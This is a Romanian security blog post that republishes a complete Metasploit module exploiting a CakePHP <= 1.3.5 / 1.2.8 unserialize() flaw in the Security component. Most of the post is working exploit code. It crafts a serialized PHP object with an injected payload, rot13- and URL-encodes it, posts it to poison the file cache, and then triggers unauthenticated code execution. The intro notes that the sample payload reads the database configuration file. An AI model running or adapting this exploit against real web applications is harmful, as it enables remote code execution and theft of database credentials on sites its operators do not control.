Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8 - Securitatea Informatica

Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8

Data:
20 noiembrie 2010

Descriere:
Acest cod exploateaza o vulnerabilitate unserialize() in componenta de securitate a CakePHP. Mai multe detalii aici.

Acest exploit functioneaza impotriva oricarei aplicatii dezvoltate pe framework-ul CakePHP care foloseste form-uri POST cu token-uri de securitate si foloseste configuratia Cache default (file-system caching). Este posibila exploatarea si pentru alte tipuri de cache dar metoda nu este la fel de “eleganta”.

Payload-ul folosit in acest exemplu afiseaza fisierul de configurare pentru baza de date, dar pot fi folosite si alte payload-uri.

Exploit:

##
# $Id: cakephp_cache_corruption.rb 11074 2010-11-19 20:43:56Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit',
			'Description'    => %q{

					CakePHP is a popular PHP framework for building web applications.
				The Security component of CakePHP is vulnerable to an unserialize attack which
				could be abused to allow unauthenticated attackers to execute arbitrary
				code with the permissions of the webserver.
			},
			'Author'	=>	[
					'tdz',
					'Felix Wilhelm', # poc
					],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11074 $',
			'References'     =>
				[
					[ 'OSVDB', '69352'],
					[ 'BID', '44852' ],
					[ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ]
				],
			'Privileged'     => false,
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Payload'        =>
				{
					'Space'       => 4000,
					# max url length for some old versions of apache according to
					# http://www.boutell.com/newfaq/misc/urllength.html
					'DisableNops' => true,
					#'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Keys'        => ['php'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 15 2010'
			))

			register_options(
				[
					OptString.new('URI',	[ true, "CakePHP POST path", '/']),
					OptString.new('OptionalPostData',	[ false, "Optional POST data", '']),
				], self.class)
	end

	def exploit
		#path = rand_text_alphanumeric(rand(5)+5)
		key = rand_text_alphanumeric(rand(5)+5)
		fields = rand_text_alphanumeric(rand(5)+5)

		#payload =  "readfile('../config/database.php'); exit();"
		len=payload.encoded.length + 6

		p = ""
		p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4'
		p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}'
		p << 's:3:"Foo";s:'
		p << len.to_s()
		p << ':"<? '
		p << payload.encoded
		p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'

		#rot13 and urlencode
		p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m")
		p = CGI.escape(p)

		data = "data%5b_Token%5d%5bkey%5d="
		data << key
		data << "&data%5b_Token%5d%5bfields%5d="
		data << fields
		data << p
		data << "&_method=POST"

		#some apps need the form post data
		if datastore['OptionalPostData']
			postdata = CGI.escape(datastore['OptionalPostData'])
			data << "&"
			data << postdata
		end

		print_status("Sending exploit request 1")
		res = send_request_cgi(
		{
			'uri'    => datastore['URI'],
			'method' => "POST",
			'ctype' => 'application/x-www-form-urlencoded',
			'data'   => data
		}, 5)

		print_status("Sending exploit request 2")
		res = send_request_cgi(
		{
			'uri'    => datastore['URI'],
			'method' => "POST",
			'ctype' => 'application/x-www-form-urlencoded',
			'data'   => data
		},5)

		print_status("Requesting our payload")
		response = send_request_raw({
			# Allow findsock payloads to work
			'global' => true,
			'uri' => datastore['URI']
		}, 5)

		handler
	end
end
Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro